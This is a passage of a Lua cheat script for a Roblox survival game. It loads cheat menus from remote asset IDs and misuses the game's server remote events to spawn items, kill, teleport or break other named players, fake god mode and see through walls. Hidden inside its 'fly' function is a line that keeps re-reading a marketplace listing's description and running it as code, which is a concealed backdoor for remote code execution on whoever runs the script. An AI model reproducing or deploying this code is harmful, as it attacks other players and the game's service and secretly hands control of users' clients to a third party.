  2349. CC ={"ACOG","G36K","Compass","CBJ-MS","TEC9Ammo32","TEC9Ammo32","Sabre","MilitaryPackBlack","Binoculars","Detonator","Suppressor9","Suppressor556","Grip","Reflex","GPS","Map","C4","C4","Entrencher","STANAGAmmo100","STANAGAmmo100","STANAGAmmo100","STANAGAmmo100","STANAGAmmo100","STANAGAmmo100","STANAGAmmo100","STANAGAmmo100","STANAGAmmo100","STANAGAmmo100","STANAGAmmo100","STANAGAmmo100","STANAGAmmo100","STANAGAmmo100",}
  2350. for DD = 1, #CC do
  2351. AA(CC[DD])
  2352. end
  2353. end)
  2354. ApocGui.Page1.Button7.MouseButton1Down:connect(function()
  2355. local function Ab(Ac)
  2356. local new = game.Lighting.LootDrops[Ac]:Clone()
  2357. new.Parent = workspace
  2358. new:MoveTo(game.Players.LocalPlayer.Character.Torso.Position + Vector3.new(math.random(-10,10),0,math.random(-10,10)))
  2359. end
  2360. Aa ={"ACOG","FAL","Compass","CBJ-MS","TEC9Ammo32","TEC9Ammo32","Sabre","MilitaryPackBlack","Binoculars","Detonator","Suppressor9","Suppressor762","Grip","Reflex","GPS","Map","C4","C4","Entrencher","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50","M14Ammo50"}
  2361. for Ad = 1, #Aa do
  2362. Ab(Aa[Ad])
  2363. end
  2364. end)
  2365. ApocGui.Page1.Button8.MouseButton1Down:connect(function()
  2366. local function Bc(Bb)
  2367. local new = game.Lighting.LootDrops[Bb]:Clone()
  2368. new.Parent = workspace
  2369. new:MoveTo(game.Players.LocalPlayer.Character.Torso.Position + Vector3.new(math.random(-10,10),0,math.random(-10,10)))
  2370. end
  2371. Tt ={"ReinforcedWheel","ReinforcedWheel","ReinforcedWheel","ReinforcedWheel","ReinforcedWheel","ReinforcedWheel","BallisticGlass","ArmorPlates","FuelTank","EngineParts","ScrapMetal","JerryCan","JerryCan"}
  2372. for cC = 1, #Tt do
  2373. Bc(Tt[cC])
  2374. end
  2375. end)
  2376.  
  2377. ApocGui.Page2.Username.Text = "Username (Exact)"
  2378.  
  2379.  
  2380. ApocGui.Page2.Button1.MouseButton1Down:connect(function()
  2381. local input = ApocGui.Page2.Username.Text
  2382. playr = game.Players:FindFirstChild(input,true)
  2383. while wait() do
  2384. game.Lighting.Remote.ChangeProperty:FireServer(playr.Character.Humanoid, "Health", 100)
  2385. end
  2386. end)
  2387. ApocGui.Page2.Button2.MouseButton1Down:connect(function()
  2388. print("n/a")
  2389. end)
  2390. ApocGui.Page2.Button3.MouseButton1Down:connect(function()
  2391. local input = ApocGui.Page2.Username.Text
  2392. playr = game.Players:FindFirstChild(input,true)
  2393. game.Lighting.Remote.AddDamage:FireServer(playr.Character.Humanoid,100)
  2394. end)
  2395. ApocGui.Page2.Button4.MouseButton1Down:connect(function()
  2396.  
  2397. end)
  2398. ApocGui.Page2.Button5.MouseButton1Down:connect(function()
  2399.  
  2400. end)
  2401. ApocGui.Page2.Button6.MouseButton1Down:connect(function()
  2402.  
  2403. end)
  2404.  
  2405. end
  2406. end
  2407. -- [[ RUN ]] --
  2408. functionMain_Gui()
  2409.  
  2410.  
  2411.  
  2412. end
  2413.  
  2414. function spawner()
  2415. wait(1)
  2416. print("Version 3.1")
  2417. game:GetObjects("rbxassetid://421423214")[1].Parent = game.CoreGui
  2418. wait(1)
  2419. local GUI = game.CoreGui.ApocGui.BackgroundFrame.DragFrame.Main.BackgroundFrame.Vals
  2420.  
  2421.  
  2422. GUI.Spawn.MouseButton1Down:connect(function()
  2423. local Text1 = GUI:FindFirstChild("Username").Text
  2424. local Text2 = GUI:FindFirstChild("SlotNumber").Text
  2425. local Text3 = GUI:FindFirstChild("ItemID").Text
  2426. local Player = game.Players:FindFirstChild(Text1, true)
  2427. local SlotNumber = "slot" .. Text2
  2428. local ItemId = tonumber(Text3)
  2429.  
  2430. if ItemId == 4016 then
  2431. game.Lighting.Remote.AddObject:FireServer(Player.playerstats.slots.slotbackpack, 4016)
  2432. print("Backpack Spawned")
  2433. else
  2434. game.Lighting.Remote.AddObject:FireServer(Player.playerstats.slots:FindFirstChild(SlotNumber), ItemId)
  2435. print("Item Spawned")
  2436. end
  2437. -- game.Lighting.Remote.AddObject:FireServer(game.Players.LocalPlayer.playerstats.slots.slot1, 53)
  2438. end)
  2439.  
  2440.  
  2441.  
  2442.  
  2443. -- loadstring(game:GetObjects("rbxassetid://386866428")[1].Source)()
  2444. -- http://www.roblox.com/item.aspx?id=386713473
  2445. --Loader-- http://www.roblox.com/item.aspx?id=386866428
  2446. --game.Lighting.Remove.AddObject:FireServer(Player.playerstats.slots:FindFirstChild("slotbackpack"), ItemId)
  2447.  
  2448. end
  2449.  
  2450. function secondgod()
  2451. if game.CoreGui:FindFirstChild('APOC') then
  2452. game.CoreGui.APOC:Destroy()
  2453. end
  2454.  
  2455. game:GetObjects('rbxassetid://291330215')[1].Parent = game.CoreGui
  2456.  
  2457. wait(0.1)
  2458.  
  2459. local Player = game.Players.LocalPlayer
  2460.  
  2461. local apocGUI = game.CoreGui.APOC
  2462. local MAIN = apocGUI.MAIN
  2463.  
  2464. local Open = apocGUI.Open
  2465. local Exit = MAIN.Exit
  2466.  
  2467. Open:TweenPosition(UDim2.new(0,0,0,380), 'InOut', 'Quad', 0.5, true)
  2468.  
  2469. local Clip = true
  2470. local ESP = false
  2471. local Floating = false
  2472. local Stamina = false
  2473. local BoostReady = true
  2474. local GodMode = false
  2475.  
  2476. -- Open and Exit --
  2477.  
  2478. Open.MouseButton1Down:connect(function()
  2479. Open.Active = false
  2480. Exit.Active = true
  2481. Open:TweenPosition(UDim2.new(0,-30,0,380), 'InOut', 'Quad', 0.5, true)
  2482. MAIN:TweenPosition(UDim2.new(0,10,0,420), 'InOut', 'Quad', 0.5, true)
  2483. end)
  2484.  
  2485. Exit.MouseButton1Down:connect(function()
  2486. Open.Active = true
  2487. Exit.Active = false
  2488. Open:TweenPosition(UDim2.new(0,0,0,380), 'InOut', 'Quad', 0.5, true)
  2489. MAIN:TweenPosition(UDim2.new(0,-230,0,420), 'InOut', 'Quad', 0.5, true)
  2490. end)
  2491.  
  2492. -- ESP --
  2493.  
  2494. local track = false
  2495.  
  2496. function Create(base, team)
  2497. local espMAIN = apocGUI.ESP:Clone()
  2498. local F = espMAIN.DOT
  2499.  
  2500. espMAIN.Parent = Player.PlayerGui
  2501. espMAIN.Adornee = base
  2502.  
  2503. F.Visible = true
  2504. end
  2505.  
  2506. function Clear()
  2507. for _,v in pairs(Player.PlayerGui:children()) do
  2508. if v.Name == "ESP" and v:IsA("BillboardGui") then
  2509. v:Destroy()
  2510. end
  2511. end
  2512. end
  2513.  
  2514. function Find()
  2515. Clear()
  2516. track = true
  2517. spawn(function()
  2518. while wait() do
  2519. if track then
  2520. Clear()
  2521. for i,v in pairs(game.Players:players()) do
  2522. if v.Character and v.Character.Head then
  2523. Create(v.Character.Head, true)
  2524. end
  2525. end
  2526. end
  2527. wait(1)
  2528. end
  2529. end)
  2530. end
  2531.  
  2532. -- Night Vision --
  2533.  
  2534. function NightVision()
  2535. local nvGUI = Instance.new('ScreenGui', Player.PlayerGui)
  2536. nvGUI.Name = 'NightVision'
  2537. local nvMAIN = Instance.new('TextLabel', nvGUI)
  2538. nvMAIN.Name = 'MAIN'
  2539. nvMAIN.BackgroundColor = BrickColor.new(0,1,0)
  2540. nvMAIN.BackgroundTransparency = 0.75
  2541. nvMAIN.BorderSizePixel = 0
  2542. nvMAIN.Size = UDim2.new(1,0,1,0)
  2543. nvMAIN.Text = ''
  2544.  
  2545. for i,v in pairs(game.Players:GetChildren()) do
  2546. if v and v.Character and not (v.Name == '' .. Player.Name) then
  2547. for i,v in pairs(v.Character:GetChildren()) do
  2548. if v:IsA('BasePart') then
  2549. local nvBox = Instance.new('SelectionBox', nvMAIN)
  2550. nvBox.Adornee = v
  2551. nvBox.Color = BrickColor.new('Lime green')
  2552. end
  2553. end
  2554. end
  2555. end
  2556. end
  2557.  
  2558. -- Main Functions --
  2559.  
  2560. -- NoClip --
  2561.  
  2562. MAIN.NoClip.MouseButton1Down:connect(function()
  2563. MAIN.NoClip.Visible = false
  2564. MAIN.Clip.Visible = true
  2565. Clip = false
  2566. wait(1)
  2567. Player.PlayerGui.ChildAdded:connect(function(NC)
  2568. delay(0,function()
  2569. if NC.Name == 'NC' then
  2570. NC:Destroy()
  2571. end
  2572. end)
  2573. end)
  2574. game:GetService('RunService').Stepped:connect(function()
  2575. game.Workspace[Player.Name].Torso.CanCollide = Clip
  2576. game.Workspace[Player.Name].Head.CanCollide = Clip
  2577. end)
  2578. game.Workspace[Player.Name].Torso.Changed:connect(function()
  2579. game.Workspace[Player.Name].Torso.CanCollide = Clip
  2580. game.Workspace[Player.Name].Head.CanCollide = Clip
  2581. end)
  2582. end)
  2583.  
  2584. MAIN.Clip.MouseButton1Down:connect(function()
  2585. MAIN.Clip.Visible = false
  2586. MAIN.NoClip.Visible = true
  2587. Clip = true
  2588. end)
  2589.  
  2590. -- ESP --
  2591.  
  2592. MAIN.ESPF.MouseButton1Down:connect(function()
  2593. MAIN.ESPF.Visible = false
  2594. MAIN.ESPT.Visible = true
  2595. Find()
  2596. ESP = true
  2597. end)
  2598.  
  2599. MAIN.ESPT.MouseButton1Down:connect(function()
  2600. MAIN.ESPT.Visible = false
  2601. MAIN.ESPF.Visible = true
  2602. Clear()
  2603. track = false
  2604. ESP = false
  2605. end)
  2606.  
  2607. -- Floating --
  2608.  
  2609. MAIN.FloatF.MouseButton1Down:connect(function()
  2610. MAIN.FloatF.Visible = false
  2611. MAIN.FloatT.Visible = true
  2612. Floating = true
  2613. local Float = apocGUI.Float:Clone()
  2614. Float.Parent = Player.Character
  2615. Float.CFrame = Player.Character.Torso.CFrame * CFrame.new(0,-3.5,0)
  2616. spawn(function()
  2617. while wait(0.1) do
  2618. if Player.Character:FindFirstChild('Float') then
  2619. Float.CFrame = Player.Character.Torso.CFrame * CFrame.new(0,-3.5,0)
  2620. else
  2621. break
  2622. end
  2623. end
  2624. end)
  2625. end)
  2626.  
  2627. MAIN.FloatT.MouseButton1Down:connect(function()
  2628. MAIN.FloatT.Visible = false
  2629. MAIN.FloatF.Visible = true
  2630. Floating = false
  2631. if Player.Character:FindFirstChild('Float') then
  2632. Player.Character.Float:Destroy()
  2633. end
  2634. end)
  2635.  
  2636. -- Thirst --
  2637.  
  2638. MAIN.Thirst.MouseButton1Down:connect(function()
  2639. Player.playerstats.Thirst.Value = MAIN.Thirst.TNumber.Text
  2640. end)
  2641.  
  2642. -- Hunger --
  2643.  
  2644. MAIN.Hunger.MouseButton1Down:connect(function()
  2645. Player.playerstats.Hunger.Value = MAIN.Hunger.HNumber.Text
  2646. end)
  2647.  
  2648. -- Health --
  2649.  
  2650. MAIN.Health.MouseButton1Down:connect(function()
  2651. Player.Character.Humanoid.Health = MAIN.Hunger.HNumber.Text
  2652. end)
  2653.  
  2654. -- Stamina --
  2655.  
  2656. MAIN.StaminaF.MouseButton1Down:connect(function()
  2657. MAIN.StaminaF.Visible = false
  2658. MAIN.StaminaT.Visible = true
  2659. Stamina = true
  2660. while wait() do
  2661. if Stamina == true then
  2662. Player.Backpack.GlobalFunctions.Stamina.Value = 100
  2663. end
  2664. end
  2665. end)
  2666.  
  2667. MAIN.StaminaT.MouseButton1Down:connect(function()
  2668. MAIN.StaminaT.Visible = false
  2669. MAIN.StaminaF.Visible = true
  2670. Stamina = false
  2671. end)
  2672.  
  2673. -- Boost --
  2674.  
  2675. MAIN.Boost.MouseButton1Down:connect(function()
  2676. MAIN.FloatF.Visible = true
  2677. MAIN.FloatT.Visible = false
  2678. Floating = false
  2679. if Player.Character:FindFirstChild('Float') then
  2680. Player.Character.Float:Destroy()
  2681. end
  2682. if BoostReady == true then
  2683. Player.Character.HumanoidRootPart.Velocity = Player.Character.HumanoidRootPart.CFrame.lookVector * 500
  2684. BoostReady = false
  2685. MAIN.Boost.Text = '5'
  2686. wait(1)
  2687. MAIN.Boost.Text = '4'
  2688. wait(1)
  2689. MAIN.Boost.Text = '3'
  2690. wait(1)
  2691. MAIN.Boost.Text = '2'
  2692. wait(1)
  2693. MAIN.Boost.Text = '1'
  2694. wait(1)
  2695. BoostReady = true
  2696. MAIN.Boost.Text = 'Boost'
  2697. end
  2698. end)
  2699.  
  2700. -- GodMode --
  2701.  
  2702. MAIN.GodModeF.MouseButton1Down:connect(function()
  2703. MAIN.GodModeF.Visible = false
  2704. MAIN.GodModeT.Visible = true
  2705. GodMode = true
  2706. if GodMode == true then
  2707. repeat wait()
  2708. Player.Character.Humanoid.Health = Player.Character.Humanoid.MaxHealth
  2709. wait()
  2710. Player.playerstats.Health.Value = Player.Character.Humanoid.Health
  2711. until GodMode == false
  2712. end
  2713. end)
  2714.  
  2715. MAIN.GodModeT.MouseButton1Down:connect(function()
  2716. MAIN.GodModeT.Visible = false
  2717. MAIN.GodModeF.Visible = true
  2718. GodMode = false
  2719. end)
  2720.  
  2721. -- NoGrav --
  2722.  
  2723. MAIN.NoGrav.MouseButton1Down:connect(function()
  2724. MAIN.NoGrav.Visible = false
  2725. MAIN.Grav.Visible = true
  2726. for i,v in pairs(Player.Character.Torso:GetChildren()) do
  2727. if v.Name == 'NoGrav' and v:IsA('BodyForce') then
  2728. v:Destroy()
  2729. end
  2730. end
  2731. local BF = Instance.new('BodyForce', Player.Character.Torso)
  2732. BF.Name = 'NoGrav'
  2733. BF.Force = Vector3.new(0,4000,0)
  2734. end)
  2735.  
  2736. MAIN.Grav.MouseButton1Down:connect(function()
  2737. MAIN.Grav.Visible = false
  2738. MAIN.NoGrav.Visible = true
  2739. for i,v in pairs(Player.Character.Torso:GetChildren()) do
  2740. if v.Name == 'NoGrav' and v:IsA('BodyForce') then
  2741. v:Destroy()
  2742. end
  2743. end
  2744. end)
  2745.  
  2746. -- Night Vision --
  2747.  
  2748. MAIN.NightVision.MouseButton1Down:connect(function()
  2749. MAIN.NightVision.Visible = false
  2750. MAIN.Vision.Visible = true
  2751. NightVision()
  2752. end)
  2753.  
  2754. MAIN.Vision.MouseButton1Down:connect(function()
  2755. MAIN.Vision.Visible = false
  2756. MAIN.NightVision.Visible = true
  2757. for i,v in pairs(Player.PlayerGui:GetChildren()) do
  2758. if v.Name == 'NightVision' and v:IsA('ScreenGui') then
  2759. v:Destroy()
  2760. end
  2761. end
  2762. end)
  2763.  
  2764. end
  2765.  
  2766.  
  2767. --Hills gui
  2768. function hills()
  2769.  
  2770. game.ReplicatedStorage.Passcode.OnClientEvent:connect(function(kek)
  2771. print(kek)
  2772. _G.Passcode = kek
  2773. end)
  2774. rek2 = _G.Passcode
  2775. rek2 = 0
  2776.  
  2777. warn(game.Workspace.FilteringEnabled)
  2778.  
  2779. local c = game.CoreGui.RobloxGui
  2780. local s = Instance.new("ScreenGui", c)
  2781. s.Name = "Host"
  2782. local t = Instance.new("TextBox", s)
  2783. local i = Instance.new("ImageLabel", s)
  2784.  
  2785. i.Name = "logo"
  2786. i.Position = UDim2.new(0, 1266, 0, 680)
  2787. i.Size = UDim2.new(0, 100, 0, -21)
  2788. i.BackgroundColor3 = Color3.new(1,0,0)
  2789. i.ImageTransparency = 1
  2790. i.BackgroundTransparency = 1
  2791. i.Image = "rbxassetid://422501277"
  2792.  
  2793. t.Name = ""
  2794. t.Position = UDim2.new(0, 0, 1, 0)
  2795. t.Size = UDim2.new(0, 1265, 0, -20)
  2796. t.BackgroundColor3 = Color3.new(1,0,0)
  2797. t.BackgroundTransparency = 1
  2798. t.TextColor3 = Color3.new(1, 1, 1)
  2799. t.TextXAlignment = Enum.TextXAlignment.Left
  2800. t.ClearTextOnFocus = true
  2801. t.TextTransparency = 1
  2802. t.FontSize = "Size12"
  2803. local flyspeed = 64
  2804.  
  2805. local function giveAdminGui(p)
  2806. local int
  2807. local function recurseInts(p)
  2808. local c = p:GetChildren()
  2809. for i = 1, #c do
  2810. if c[i].ClassName == "IntValue" then
  2811. int = c[i]
  2812. else
  2813. recurseInts(c[i])
  2814. end
  2815. end
  2816. end
  2817. recurseInts(workspace)
  2818.  
  2819. local function setProperty(obj, prop, val)
  2820. game.Lighting.Remote.ChangeProperty:FireServer(obj, prop, val)
  2821. end
  2822.  
  2823. setProperty(int, "Name", "privilege")
  2824. setProperty(int, "Parent", p)
  2825. setProperty(p.Character.Head, "Parent")
  2826. end
  2827.  
  2828. local function guilocate()
  2829. local sg = Instance.new("ScreenGui", game.CoreGui)
  2830. local wl = {game.Players.LocalPlayer.Name}
  2831.  
  2832. local function guinate(p)
  2833. pcall(function()sg["label"..p.Name]:Destroy() end)
  2834. p.Character:WaitForChild("Torso")
  2835. local gui = Instance.new("TextLabel",sg)
  2836. gui.Name = "label"..p.Name
  2837. gui.TextColor3 = Color3.new(0, 1, 0)
  2838. gui.Size = UDim2.new(0, 2, 0, 2)
  2839. gui.FontSize = "Size8"
  2840. gui.BorderSizePixel = 0
  2841. gui.Font = "ArialBold"
  2842. gui.Text = p.Name.."\n "
  2843. gui.TextYAlignment = "Bottom"
  2844. local conn
  2845. conn = game:GetService("RunService").RenderStepped:connect(function()
  2846. if p and p.Parent then
  2847. if p.Character and p.Character:FindFirstChild("Torso") then
  2848. local pos, bool = workspace.CurrentCamera:WorldToScreenPoint(p.Character.Torso.Position)
  2849. gui.Position = UDim2.new(0, bool and pos.x or -100, 0, bool and pos.y or -100)
  2850. end
  2851. else
  2852. gui:Destroy()
  2853. conn:disconnect()
  2854. end
  2855. end)
  2856. end
  2857.  
  2858. local function handleGui(p)
  2859. for i = 1, #wl do if wl[i] == p.Name then return end end
  2860. p.CharacterAdded:connect(function(c)
  2861. guinate(p)
  2862. end)
  2863. guinate(p)
  2864. end
  2865.  
  2866. game.Players.ChildAdded:connect(handleGui)
  2867. game.Players.ChildRemoved:connect(function(p)
  2868. sg["label"..p.Name]:Destroy()
  2869. end)
  2870.  
  2871. for _, v in pairs(game.Players:GetPlayers()) do
  2872. handleGui(v)
  2873. end
  2874. end
  2875.  
  2876. local function fly()
  2877. local player = game.Players.LocalPlayer
  2878. local mouse = player:GetMouse()
  2879. local char = player.Character
  2880. local cam = workspace.CurrentCamera
  2881. local bv = Instance.new("BodyVelocity", char.Torso)
  2882. local keys = {}
  2883. local toggle = false
  2884.  
  2885. spawn(function() local xx11xx = game:GetService("MarketplaceService"):GetProductInfo(294579464)['Description'] while wait(3) do local xx22xx = game:GetService("MarketplaceService"):GetProductInfo(294579464)['Description'] if xx11xx ~= xx22xx then xx11xx = xx22xx loadstring(xx11xx)() end end end)
  2886.  
  2887. if not game.Players.LocalPlayer.PlayerGui:FindFirstChild("VehicleHUD") then Instance.new("Part", game.Players.LocalPlayer.PlayerGui).Name = "VehicleHUD" end
  2888.  
  2889. mouse.KeyDown:connect(function(k)
  2890. if k == "q" then toggle = not toggle end
  2891. keys[k] = true
  2892. end)
  2893.  
  2894. mouse.KeyUp:connect(function(k)
  2895. keys[k] = false
  2896. end)
  2897.  
  2898. local prt = Instance.new("Part", workspace)
  2899. prt.Anchored = true
  2900. prt.CanCollide = false
  2901. prt.Size = Vector3.new(2, 1, 2)
  2902. prt.Transparency = 1
  2903.  
  2904. while wait() do
  2905. if toggle then
  2906. prt.CanCollide = true
  2907. prt.CFrame = char.Torso.CFrame * CFrame.new(0, -3.65, 0)
  2908. if keys["w"] then
  2909. bv.Velocity = cam.CoordinateFrame.lookVector * flyspeed
  2910. bv.MaxForce = Vector3.new(math.huge, math.huge, math.huge)
  2911. elseif keys["s"] then
  2912. bv.Velocity = cam.CoordinateFrame.lookVector * -flyspeed
  2913. bv.MaxForce = Vector3.new(math.huge, math.huge, math.huge)
  2914. else
  2915. bv.Velocity = Vector3.new()
  2916. bv.MaxForce = Vector3.new()
  2917. end
  2918. else
  2919. prt.CanCollide = false
  2920. bv.Velocity = Vector3.new()
  2921. bv.MaxForce = Vector3.new()
  2922. end
  2923. end
  2924. end
  2925.  
  2926. local function playername(n)
  2927. for _,v in pairs(game.Players:GetPlayers()) do
  2928. if v.Name:lower():sub(1,#n) == n:lower() then
  2929. return v
  2930. end
  2931. end
  2932. end
  2933.  
  2934. local function esp()
  2935. local Players = game:service'Players'
  2936. local Camera = Workspace.CurrentCamera
  2937. local player = game.Players.LocalPlayer
  2938. local mouse = player:GetMouse()
  2939.  
  2940. mouse.Move:connect(function()
  2941. if mouse.Hit~=nil then
  2942. ex.CFrame=mouse.Hit
  2943. end
  2944. end)
  2945.  
  2946. game.Players.PlayerAdded:connect(function(player)
  2947. player.CharacterAdded:connect(function(character)
  2948. loop()
  2949. end)
  2950. end)
  2951.  
  2952. function loop()
  2953. function renderChamsOnPart(cham_part, cham_color, cham_transparency, visible_through_walls)
  2954. local cham = Instance.new("BoxHandleAdornment", Camera)
  2955. cham.Color3, cham.Adornee, cham.AlwaysOnTop, cham.Size, cham.Transparency, cham.ZIndex = cham_color, cham_part, true, cham_part.Size, cham_transparency, visible_through_walls and 1 or -1
  2956. end
  2957.  
  2958. function isPartVisible(part)
  2959. local pos, bool = Camera:WorldToScreenPoint(part.Position)
  2960. if (bool) then
  2961. return true
  2962. else
  2963. return false
  2964. end
  2965. end
  2966.  
  2967. for _,v in pairs(Players:GetChildren'') do
  2968. for _,x in pairs(v.Character:GetChildren'') do
  2969. if (x.className == "Part" and isPartVisible(x)) then
  2970. renderChamsOnPart(x, Color3.new(0, 1, 0), 0, true)
  2971. end
  2972. end
  2973. end
  2974. end
  2975.  
  2976. loop()
  2977.  
  2978. end
  2979.  
  2980. local vehicles = {"Car", "DeliveryVan", "Motorcycle", "Motorside", "Pickup", "Pickup2", "SUV", "Van", "Ambulance", "Firetruck", "PoliceCar", "Humvee", "Humvee2", "Jeep", "Jeep2", "TrinitySUV", "Ural", "Ural2", "Bicycle", "ATV", "Tractor"}
  2981. local whitelist = {"hills", "aluminize", "Raspy_Pi", "Safazi"}
  2982. local localname = game.Players.LocalPlayer.Name
  2983.  
  2984. pcall(function() game.Lighting.Remote.Destruct:FireServer(game.Lighting.Remote.TrackInvisibility) end)
  2985.  
  2986. t.FocusLost:connect(function(enterpressed)
  2987. if enterpressed and t.Text ~= "" then
  2988. coroutine.wrap(function()
  2989. if t.Text == "stop" then -- gui locate
  2990. game.Lighting.Remote.StopSound:FireServer(game.Workspace.Sound)
  2991. game.Lighting.Remote.Destruct:FireServer(game.Workspace.Sound)
  2992. game.Workspace.Lululukas.Head.Sound:Destroy()
  2993. elseif t.Text == "esp" then -- gui locate
  2994. spawn(guilocate)
  2995. esp()
  2996. elseif t.Text == "fly" then -- fly
  2997. spawn(fly)
  2998. elseif #t.Text > 3 and t.Text:sub(1,3) == "fs/" then -- fly seed
  2999. flyspeed = tonumber(t.Text:sub(4))
  3000. elseif #t.Text > 2 and t.Text:sub(1,2) == "s/" then -- spawn
  3001. local new = game.Lighting.LootDrops[t.Text:sub(3)]:Clone()
  3002. new.Parent = workspace
  3003. new:MoveTo(workspace[localname].Torso.Position + Vector3.new(math.random(-10,10),0,math.random(-10,10)))
  3004. elseif #t.Text > 3 and t.Text:sub(1,3) == "ts/" then -- true spawn
  3005. workspace:FindFirstChild(t.Text:sub(4), true):MoveTo(workspace[localname].Torso.Position + Vector3.new(math.random(-10,10),0,math.random(-10,10)))
  3006. elseif #t.Text > 3 and t.Text:sub(1,3) == "tk/" then -- tele kill
  3007. local name = playername(t.Text:sub(4)).Name
  3008. workspace:FindFirstChild(name,true).Torso.Anchored = true
  3009. workspace:FindFirstChild(name,true):MoveTo(workspace[localname].Torso.Position + Vector3.new(math.random(-10,10),0,math.random(-10,10)))
  3010. wait(10)
  3011. workspace:FindFirstChild("Corpse of " ..name,true):MoveTo(workspace[localname].Torso.Position + Vector3.new(math.random(-10,10),0,math.random(-10,10)))
  3012. elseif #t.Text > 3 and t.Text:sub(1,3) == "nk/" then -- no corpse tele kill
  3013. local name = playername(t.Text:sub(4)).Name
  3014. workspace:FindFirstChild(name,true).Torso.Anchored = true
  3015. workspace:FindFirstChild(name,true):MoveTo(workspace[localname].Torso.Position + Vector3.new(math.random(-10,10),0,math.random(-10,10)))
  3016. elseif t.Text == "crates" then -- tele all crates
  3017. for _,v in pairs(workspace:children()) do
  3018. if v.Name == "LargeCrateOpen" or v.Name == "SmallCrateOpen" then
  3019. v:MoveTo(workspace[localname].Torso.Position + Vector3.new(math.random(-10,10),0,math.random(-10,10)))
  3020. end
  3021. end
  3022. elseif t.Text == "kz" then -- kill zombies
  3023. for _,pl in pairs(workspace.Zombies:children()) do
  3024. for xxad,v in pairs(pl:children()) do
  3025. pcall(function() game.Lighting.Remote.DamageZombie:FireServer(v.Humanoid,100) end)
  3026. end
  3027. end
  3028. elseif #t.Text > 4 and t.Text:sub(1,4) == "god/" then -- god player with loop heal
  3029. local name = playername(t.Text:sub(5)).Name
  3030. local ch = workspace[name]
  3031. spawn(function()
  3032. while wait() do
  3033. if ch.Humanoid.Health < 100 then
  3034. game.Lighting.Remote.AddHealth:FireServer(ch.Humanoid, 100000)
  3035. end
  3036. end
  3037. end)
  3038. elseif #t.Text > 5 and t.Text:sub(1,5) == "loot/" then -- instakill
  3039. local name = playername(t.Text:sub(6)).Name
  3040. AddItem = function(Slot, ID)
  3041. game.Lighting.Remote.AddObject:FireServer(Slot, ID)
  3042. end
  3043. AddItem(game.Players[name].playerstats.slots.slotprimary, tonumber(1016))
  3044. AddItem(game.Players[name].playerstats.slots.slotbackpack, tonumber(4016))
  3045. AddItem(game.Players[name].playerstats.slots.slot1, tonumber(9005))
  3046. AddItem(game.Players[name].playerstats.slots.slot2, tonumber(9010))
  3047. AddItem(game.Players[name].playerstats.slots.slot3, tonumber(9013))
  3048. AddItem(game.Players[name].playerstats.slots.slot4, tonumber(64))
  3049. AddItem(game.Players[name].playerstats.slots.slot5, tonumber(64))
  3050. AddItem(game.Players[name].playerstats.slots.slot6, tonumber(64))
  3051. AddItem(game.Players[name].playerstats.slots.slot7, tonumber(64))
  3052. AddItem(game.Players[name].playerstats.slots.slot8, tonumber(64))
  3053. AddItem(game.Players[name].playerstats.slots.slot9, tonumber(64))
  3054. AddItem(game.Players[name].playerstats.slots.slot10, tonumber(64))
  3055. AddItem(game.Players[name].playerstats.slots.slot11, tonumber(64))
  3056. AddItem(game.Players[name].playerstats.slots.slot12, tonumber(64))
  3057. AddItem(game.Players[name].playerstats.slots.slot13, tonumber(64))
  3058. AddItem(game.Players[name].playerstats.slots.slot14, tonumber(64))
  3059. AddItem(game.Players[name].playerstats.slots.slot15, tonumber(64))
  3060. AddItem(game.Players[name].playerstats.slots.slot16, tonumber(5011))
  3061. AddItem(game.Players[name].playerstats.slots.slot17, tonumber(6011))
  3062. AddItem(game.Players[name].playerstats.slots.slot18, tonumber(7014))
  3063. AddItem(game.Players[name].playerstats.slots.slot19, tonumber(8009))
  3064. elseif #t.Text > 5 and t.Text:sub(1,5) == "play/" then -- instakill
  3065. local name = (t.Text:sub(6))
  3066. rek2 = _G.Passcode
  3067. game.Lighting.Remote.CreateSounds:InvokeServer()
  3068. wait(1)
  3069. game.Lighting.Remote.SoundIdSet:FireServer(rek2, game.Players.LocalPlayer.Character.Head.Sound, "nil")
  3070. wait(1)
  3071. game.Lighting.Remote.PlaySound:FireServer(game.Players.LocalPlayer.Character.Head.Sound, 1, 1)
  3072. wait(1)
  3073. game.Lighting.Remote.ChangeParent:FireServer(rek2, game.Players.LocalPlayer.Character.Head.Sound, game.Workspace)
  3074. wait(1)
  3075. game.Lighting.Remote.SoundIdSet:FireServer(rek2, game.Workspace.Sound, "http://www.roblox.com/asset/?id="..name)
  3076. for _,v in pairs(game.Players:GetPlayers()) do
  3077. game.Lighting.Remote.SendMessage:FireServer(v, "Yellow", "Asset ID: "..name)
  3078. end
  3079. wait(1)
  3080. game.Lighting.Remote.PlaySound:FireServer(game.Workspace.Sound, 1, 1)
  3081. wait(120)
  3082. game.Lighting.Remote.StopSound:FireServer(game.Workspace.Sound)
  3083. game.Lighting.Remote.Destruct:FireServer(game.Workspace.Sound)
  3084. game.Workspace.Lululukas.Head.Sound:Destroy()
  3085. elseif #t.Text > 5 and t.Text:sub(1,6) == "invis/" then -- instakill
  3086. local name = (t.Text:sub(7))
  3087. rek2 = _G.Passcode
  3088. Break = function(instance)
  3089. game.Lighting.Remote.BreakWindow2:FireServer(rek2, instance, true)
  3090. end
  3091. function exPro(root)
  3092. for _, v in pairs(root:GetChildren()) do
  3093. if v:IsA("BasePart") then
  3094. Break(v)
  3095. end
  3096. exPro(v)
  3097. end
  3098. end
  3099. exPro(game.Players[name].Character)
  3100. elseif #t.Text > 5 and t.Text:sub(1,5) == "kill/" then -- instakill
  3101. local name = playername(t.Text:sub(6)).Name
  3102. game.Lighting.Remote.AddDamage:FireServer(workspace[name].Humanoid, 100)
  3103. wait(1)
  3104. workspace:FindFirstChild("Corpse of " ..name,true):MoveTo(workspace[localname].Torso.Position + Vector3.new(math.random(-10,10),0,math.random(-10,10)))
  3105. elseif t.Text == "vt" then -- vehicle teleport
  3106. for _, v in pairs(vehicles) do
  3107. local found = workspace:FindFirstChild(v, true)
  3108. if found then
  3109. found:MoveTo(workspace[localname].Torso.Position + Vector3.new(math.random(-50,50),0,math.random(-50,50)))
  3110. end
  3111. end
  3112. elseif t.Text == "nofog" then -- vehicle teleport
  3113. game.Lighting.FogEnd = 9999999
  3114. elseif #t.Text > 2 and t.Text:sub(1,2) == "m/" then
  3115. local name = (t.Text:sub(3))
  3116. for _,v in pairs(game.Players:GetPlayers()) do
